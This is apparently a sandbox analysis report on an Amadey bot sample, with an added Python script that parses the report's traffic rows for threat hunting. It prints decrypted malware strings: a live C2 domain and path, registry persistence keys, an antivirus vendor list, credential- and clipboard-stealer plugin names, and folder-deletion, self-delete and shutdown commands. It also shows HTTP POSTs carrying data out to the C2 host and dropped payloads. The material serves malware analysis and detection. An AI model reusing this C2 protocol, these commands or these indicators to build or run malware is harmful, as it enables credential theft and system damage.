Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: greatnessappreviews.com |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: /8BvxwQdec3/index.php |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: S-%lu- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 3d37ae315d |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Dctooux.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Startup |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: cmd /C RMDIR /s/q |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: rundll32 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Programs |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: %USERPROFILE% |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: cred.dll|clip.dll| |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: http:// |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: https:// |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: /Plugins/ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: &unit= |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: shell32.dll |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: kernel32.dll |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: GetNativeSystemInfo |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ProgramData\ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: AVAST Software |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Kaspersky Lab |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Panda Security |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Doctor Web |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 360TotalSecurity |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Bitdefender |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Norton |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Sophos |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Comodo |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: WinDefender |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: 0123456789 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Content-Type: multipart/form-data; boundary=---- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ------ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ?scr=1 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Content-Type: application/x-www-form-urlencoded |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ComputerName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: -unicode- |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\ |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: VideoID |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: DefaultSettings.XResolution |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: DefaultSettings.YResolution |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: ProductName |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: CurrentBuild |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: rundll32.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: "taskkill /f /im " |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: " && timeout 1 && del |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: && Exit" |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: " && ren |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: Powershell.exe |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: -executionpolicy remotesigned -File " |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: shutdown -s -t 0 |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: random |
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack |
String decryptor: >0b*j' |
Source: Traffic |
Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49735 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49738 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 45.156.23.149:80 -> 192.168.2.4:49738 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49752 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49757 -> 45.156.23.149:80 |
Source: Traffic |
Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49763 -> 45.156.23.149:80 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODQ4OTU= Host: greatnessappreviews.com Content-Length: 85047 Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: greatnessappreviews.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: greatnessappreviews.com Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODUyMDU= Host: greatnessappreviews.com Content-Length: 85357 Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: greatnessappreviews.com Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369 |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODQ4NzY= Host: greatnessappreviews.com Content-Length: 85028 Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: greatnessappreviews.com Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369 |
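As an added example (not part of the sandbox report), the Python below reads the "HTTP traffic detected" rows above and sorts the requests to greatnessappreviews.com into the four shapes the report shows: the ?scr=1 multipart upload, the 4-byte st=s body, the r= hex blob, and e0=<n>&unit=<n>. It decodes the Data Raw bytes rather than trusting the Data Ascii rendering, checks that Content-Length agrees with the recorded body, and ignores anything not aimed at the observed host and path. The shape labels are this example's own names, the rows are copied from the report with whitespace between the run-together header fields normalised (the parser also accepts the raw export form with no whitespace), and the GET row is constructed.

```python
import re
from collections import Counter
from typing import List, NamedTuple, Optional

# Endpoint taken from the report (decrypted strings and HTTP rows).
C2_HOST = "greatnessappreviews.com"
C2_PATH = "/8BvxwQdec3/index.php"

# The four distinct request rows from the report; whitespace between the
# run-together header fields has been normalised (the parser accepts both forms).
REPORT_ROWS = [
    "HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; "
    "boundary=----ODQ4OTU= Host: greatnessappreviews.com Content-Length: 85047 Cache-Control: no-cache |",
    "HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded "
    "Host: greatnessappreviews.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s |",
    "HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded "
    "Host: greatnessappreviews.com Content-Length: 154 Cache-Control: no-cache Data Raw: "
    "72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 "
    "31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 "
    "35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 "
    "37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 "
    "37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 "
    "45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 "
    "Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF"
    "8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179 |",
    "HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded "
    "Host: greatnessappreviews.com Content-Length: 31 Cache-Control: no-cache Data Raw: "
    "65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 "
    "Data Ascii: e0=1000154001&unit=246122658369 |",
]
# Constructed, not from the report: an unrelated request the parser must ignore.
OTHER_ROW = "HTTP traffic detected: GET /index.html HTTP/1.1 Host: example.com Content-Length: 0 |"

_ROW = re.compile(
    r"^HTTP traffic detected: (?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]\s*"
    r"(?P<headers>.*?)\s*"
    r"(?:Data Raw:\s*(?P<raw>(?:[0-9a-fA-F]{2}\s+)+)Data Ascii:.*)?"
    r"\s*\|?\s*$"
)
_CT = re.compile(r"Content-Type:\s*(?P<ct>.*?)\s*Host:")
_HOST = re.compile(r"Host:\s*(?P<host>\S+?)\s*Content-Length:")
_CL = re.compile(r"Content-Length:\s*(?P<cl>\d+)")


class C2Request(NamedTuple):
    kind: str              # shape label assigned by this example, not a protocol field
    query: str
    content_type: str
    content_length: int
    body: Optional[bytes]  # None when the report row carries no Data Raw

    @property
    def length_ok(self) -> bool:
        """Content-Length agrees with the recorded body (vacuously true with no body)."""
        return self.body is None or len(self.body) == self.content_length


def _shape(query: str, content_type: str, body: Optional[bytes]) -> str:
    """Name the request shape using only what is visible on the wire."""
    if query == "scr=1" and content_type.startswith("multipart/form-data"):
        return "upload(scr=1)"
    if body == b"st=s":
        return "st=s"
    if body is not None and re.fullmatch(rb"r=[0-9A-F]+", body):
        return "r=<hex>"
    if body is not None and re.fullmatch(rb"e0=\d+&unit=\d+", body):
        return "e0=<n>&unit=<n>"
    return "unknown"


def parse_row(row: str) -> Optional[C2Request]:
    """Parse one sandbox row; None unless it is a request to the observed C2 endpoint."""
    m = _ROW.match(row)
    if not m:
        return None
    headers = m.group("headers")
    path, _, query = m.group("target").partition("?")
    host = _HOST.search(headers)
    if not host or host.group("host") != C2_HOST or path != C2_PATH:
        return None
    ct = _CT.search(headers)
    cl = _CL.search(headers)
    content_type = ct.group("ct") if ct else ""
    content_length = int(cl.group("cl")) if cl else 0
    raw = m.group("raw")
    # Decode the Data Raw bytes rather than trusting the Data Ascii rendering.
    body = bytes.fromhex("".join(raw.split())) if raw else None
    return C2Request(_shape(query, content_type, body), query, content_type, content_length, body)


def classify_rows(rows: List[str]) -> List[C2Request]:
    return [r for r in map(parse_row, rows) if r is not None]


def summarize(rows: List[str]) -> Counter:
    """Count C2 requests by shape: a one-line view of what the bot did in the run."""
    return Counter(r.kind for r in classify_rows(rows))


if __name__ == "__main__":
    for req in classify_rows(REPORT_ROWS):
        print(f"{req.kind:18} len={req.content_length:<6} ok={req.length_ok} body={req.body!r}")
    print(dict(summarize(REPORT_ROWS)))
```

Worth cross-checking against the rest of the report: the unit value 246122658369 is also the name of the file the process repeatedly queries under C:\Users\user\AppData\Local\Temp\, and the two e0 values 1000154001 and 1000427001 are the Temp subdirectories holding clip.exe and ma.exe, so each e0=/unit= POST lines up with one of the two payload drops. The ET rows above (2044597, 2044623 and the ETPRO CnC rules) alert on these same POST flows, so the shapes here are a reasonable starting point for a proxy-log hunt when no IDS is in line.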
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.129.199.237 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/ |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php5 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1N8 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1n8 |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpO |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpQ |
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpny |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: wininet.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: iertutil.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: windowscodecs.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: urlmon.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: srvcli.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: netutils.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Section loaded: fwpuclnt.dll |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: oTIHRjz4dn.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: oTIHRjz4dn.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\Desktop\oTIHRjz4dn.exe VolumeInformation |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\1000154001\clip.exe VolumeInformation |
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\1000427001\ma.exe VolumeInformation |